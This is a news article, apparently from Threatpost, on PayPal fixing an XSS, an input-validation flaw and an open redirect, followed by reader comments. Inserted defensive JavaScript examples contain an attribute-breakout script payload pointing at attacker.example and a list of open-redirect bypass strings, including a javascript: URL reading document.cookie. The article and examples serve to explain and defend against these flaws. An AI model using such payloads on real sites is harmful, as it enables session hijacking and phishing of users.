PayPal Fixes Trio of Remote-Access Vulnerabilities

PayPal has repaired three remote-access vulnerabilities found in different areas of its website, including a cross-site scripting (XSS) flaw on its PayPal Community Forum. All three flaws were submitted to PayPal’s Bug Bounty Program.

Researcher Benjamin Kunz Mejri of Vulnerability-Lab reported the security vulnerabilities to PayPal in September; patches were released in late October according to an advisory posted this week to the Full Disclosure list.

The XSS bug allows only the execution of client-side script and browser cookie hijacking, Mejri told Threatpost in an email. “Client-side forced requests are possible to external targets,” he said, adding this could lead to session hijacking and phishing attacks.

According to the advisory, the vulnerability was located in the add-tags function of the community forum page. Attackers could have replaced a standard value string with malicious script code or with a path to a script hosted on the attacker’s site.
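The injection described above, as an added example that is not PayPal’s code (the forum’s rendering code is not public, so the two rendering helpers below are assumed for illustration): a tag value concatenated straight into markup becomes stored XSS, while the same value rendered through an HTML escaper and a percent-encoder for the path segment stays inert.

```javascript
// Added example, not code from the PayPal forum. The rendering helpers are
// assumptions that stand in for whatever the add-tags page actually did.

// Minimal HTML escaper covering the characters that matter in both text
// and double-quoted attribute context.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable rendering: the tag value is dropped into the markup unchanged,
// both inside the href attribute and as the link text.
function renderTagUnsafe(tag) {
  return '<a class="tag" href="/tags/' + tag + '">' + tag + '</a>';
}

// Hardened rendering: percent-encode the value for the URL path segment and
// HTML-escape it for the text node. Each context gets its own encoder.
function renderTagSafe(tag) {
  return '<a class="tag" href="/tags/' + encodeURIComponent(tag) + '">' +
    escapeHtml(tag) + '</a>';
}

// Constructed payload in the style the advisory describes: close the
// attribute, then pull a script from a host the attacker controls.
const PAYLOAD = '"><script src="//attacker.example/x.js"></script>';

// Does the rendered fragment still contain an unescaped script tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

function demo() {
  const unsafe = renderTagUnsafe(PAYLOAD);
  const safe = renderTagSafe(PAYLOAD);
  return {
    unsafe,
    safe,
    unsafeExecutes: containsScriptTag(unsafe), // true: the browser would load x.js
    safeExecutes: containsScriptTag(safe),     // false: rendered as literal text
  };
}

console.log(demo());
```

The point of the two encoders is that the attribute value and the text node are different contexts: a single "strip `<script>`" filter would have left the `href` breakout intact, which is the kind of gap the advisory’s "validation vulnerability" wording describes.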

“Normally it should not be possible to inject script code as foldername and replace it with more script code to crash with an unhandled exception,” the advisory said. “Attackers can inject on [the] client side when the exception-handling is bypassed via another validation vulnerability.”

An input validation vulnerability was also discovered in the egreetings Web service of PayPal’s Plaza Web-based application. Plaza is PayPal’s shopping application; an attacker would need to be logged in to be able to send a malicious greeting via PayPal’s outgoing mail server, Mejri said. Malicious code could be injected into certain fields in the application, and the victim could be subject to session hijacking or persistent Web-based attacks.

Finally, a vulnerability that could enable an attacker to redirect users of PayPal’s content management system (customer, pro or seller accounts) was patched. Attackers could use a client-side request to send users to an external website.

“An attacker can redirect the victim over the original PayPal domain to malware or phishing sites,” Mejri said. “The potential consequence is a stolen PayPal account or external malicious redirects. Mostly users do not watch where the redirection location is when the domain request was processed through the original PayPal community domain.”
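The redirect flaw described above, as an added example that is not PayPal’s code: a handler that echoes a redirect parameter straight into the `Location` header, beside an allow-list check that resolves the value against the site’s own origin and rejects anything that lands on a foreign host or non-HTTP scheme. The origin, the host names and the `returnUrl` parameter name are assumptions made for illustration.

```javascript
// Added example, not PayPal's code. SITE_ORIGIN, ALLOWED_HOSTS and the
// returnUrl parameter are assumed names for illustration only.

const SITE_ORIGIN = 'https://www.paypal.example';
const ALLOWED_HOSTS = new Set(['www.paypal.example', 'community.paypal.example']);

// Vulnerable: whatever arrived in ?returnUrl= becomes the redirect target,
// so a link on the trusted domain can bounce the user to a phishing page.
function redirectTargetUnsafe(returnUrl) {
  return returnUrl;
}

// Hardened: parse the value relative to our own origin, require http(s),
// require an allow-listed host, and fall back to a fixed local path on any
// failure. Relative paths resolve to SITE_ORIGIN and pass; protocol-relative
// (//host), backslash, userinfo and look-alike-host tricks resolve to a
// foreign host and are rejected. The resolved href is returned, never the
// raw input, so odd spellings are normalised away before use.
function redirectTargetSafe(returnUrl, fallback = '/') {
  let url;
  try {
    url = new URL(String(returnUrl), SITE_ORIGIN);
  } catch (err) {
    return fallback;
  }
  if (url.protocol !== 'https:' && url.protocol !== 'http:') return fallback;
  if (!ALLOWED_HOSTS.has(url.hostname)) return fallback;
  return url.href;
}

// Constructed inputs: one legitimate return path, one absolute on-site URL,
// and the usual open-redirect bypass attempts.
const CASES = [
  '/myaccount/summary',
  'https://www.paypal.example/settings',
  'https://evil.example/login',
  '//evil.example/login',
  '/\\evil.example/',
  'javascript:alert(document.cookie)',
  'https://www.paypal.example@evil.example/',
  'https://www.paypal.example.evil.example/',
];

function evaluate() {
  return CASES.map((input) => ({
    input,
    unsafe: redirectTargetUnsafe(input),
    safe: redirectTargetSafe(input),
  }));
}

console.table(evaluate());
```

Checking `url.hostname` after resolution, rather than matching the raw string with a prefix or regex, is what defeats the `user@host`, `host.evil.example` and `//host` variants: all of them look like the trusted domain to a string check but parse to a different host.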

PayPal began its bug-bounty program in June. PayPal’s security team rates the severity of submitted vulnerabilities and the company determines payouts. PayPal said only cross-site scripting, cross-site request forgery, SQL injection and authentication bypass flaws are in scope for its program. Researchers must also give PayPal reasonable time to address the flaws in question.

Discussion

  • Salem on

    Benjamin is a real epic hacker!

  • Kevin LSK on

    Benjamin dominates in all exploit portals because he is one of the best.
    He impresses and also motivates me.

  • noob on

    hahaha. seriously? benjamin aka rem0ve is a big lamer! he knows nothing except copy&pasting xss payloads, using hackbar to test for simple sqli and copy&pasting AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA into input fields to find BOFs! that's why everyone is hating vulnerability-lab.com! watch the followers of vulnerability-lab... VULNERABILITY-LAB REALLY SUCKS AND BLAMES THE WHOLE SCENE!!!


  • Severin on

    Looks like you are stalking him to animate other people to hate him. He does amazing work for paypal, dell, barracuda networks, facebook and also microsoft. You say he destroys the scene, I say he repairs the scene by excluding useless people like you and evil moneymakers. He will win in the end without using a weapon even if you guys try to force him. I wish there would be more people like him. @severin

  • Mahmoud on

    Noob, it's obvious to everyone that you are jealous of Benjamin.. go home Nooob... :P
